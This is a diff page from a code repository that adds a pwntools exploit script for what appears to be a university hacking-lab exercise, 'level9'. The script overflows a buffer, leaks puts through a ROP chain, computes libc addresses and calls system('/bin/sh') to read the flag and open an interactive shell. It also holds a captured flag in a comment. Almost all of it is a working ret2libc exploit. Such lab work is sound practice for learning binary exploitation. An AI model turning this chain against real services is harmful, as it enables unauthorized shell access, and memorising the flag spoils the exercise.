9
This commit is contained in:
78
4/level9/test.py
Normal file
78
4/level9/test.py
Normal file
@@ -0,0 +1,78 @@
|
|||||||
|
# 0x0000000000401263 : pop rdi ; ret
|
||||||
|
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
HOST, PORT = "localhost", 4009
|
||||||
|
#HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4009
|
||||||
|
#p = remote(HOST, PORT)
|
||||||
|
p = process('./level9')
|
||||||
|
|
||||||
|
#question = p.recvline(timeout=2)
|
||||||
|
#print("[+] question:", question.decode().strip())
|
||||||
|
#
|
||||||
|
#question = p.recvline(timeout=2)
|
||||||
|
#print("[+] question:", question.decode().strip())
|
||||||
|
#
|
||||||
|
#payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
|
||||||
|
#p.sendline(payload.encode())
|
||||||
|
#print("sending: ", end='')
|
||||||
|
#print(payload)
|
||||||
|
#
|
||||||
|
#question = p.recvline(timeout=2)
|
||||||
|
#print("[+] question:", question.decode().strip())
|
||||||
|
#
|
||||||
|
#question = p.recvline(timeout=2)
|
||||||
|
#print("[+] question:", question.decode().strip())
|
||||||
|
|
||||||
|
|
||||||
|
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
|
||||||
|
puts_offset = libc.symbols['puts'] # e.g. 0x080aa0
|
||||||
|
system_offset = libc.symbols['system'] # e.g. 0x04f550
|
||||||
|
binsh_offset = next(libc.search(b'/bin/sh')) # e.g. 0x1b75aa
|
||||||
|
|
||||||
|
print(hex(puts_offset))
|
||||||
|
print(hex(system_offset))
|
||||||
|
print(hex(binsh_offset))
|
||||||
|
|
||||||
|
elf = ELF('./level9')
|
||||||
|
puts_plt = elf.plt['puts']
|
||||||
|
puts_got = elf.got['puts']
|
||||||
|
main = elf.symbols['main']
|
||||||
|
|
||||||
|
#help_input = p.recvline()
|
||||||
|
#print(help_input)
|
||||||
|
#puts_abs = int(help_input[-15:-1],16)
|
||||||
|
#print(hex(puts_abs))
|
||||||
|
|
||||||
|
p.recvuntil("What do you want to talk about?".encode())
|
||||||
|
payload = b'A'*40
|
||||||
|
payload += p64(0x0000000000401264)
|
||||||
|
payload += p64(0x0000000000401263)
|
||||||
|
payload += p64(puts_got)
|
||||||
|
payload += p64(puts_plt)
|
||||||
|
payload += p64(main)
|
||||||
|
p.sendline(payload)
|
||||||
|
print("send payload: ", payload)
|
||||||
|
|
||||||
|
leak = p.recvline(timeout=999)
|
||||||
|
print("[+] line:", leak)
|
||||||
|
leak = p.recvline(timeout=999)
|
||||||
|
print("[+] line:", leak)
|
||||||
|
leak = p.recvline(timeout=999)
|
||||||
|
print("[+] line:", leak)
|
||||||
|
puts_abs = int.from_bytes(leak[:-1], 'little')
|
||||||
|
print("[+] leaked puts:", hex(puts_abs))
|
||||||
|
|
||||||
|
p.recvuntil("What do you want to talk about?".encode())
|
||||||
|
|
||||||
|
payload = b'A'*40
|
||||||
|
#payload += p64(0x0000000000401264)
|
||||||
|
payload += p64(0x0000000000401263)
|
||||||
|
payload += p64(puts_abs - puts_offset + binsh_offset)
|
||||||
|
payload += p64(puts_abs - puts_offset + system_offset)
|
||||||
|
p.sendline(payload)
|
||||||
|
|
||||||
|
print("payload: ",payload)
|
||||||
|
|
||||||
|
p.sendline("cat flag.txt".encode())
|
||||||
|
p.interactive()
|
||||||
Reference in New Issue
Block a user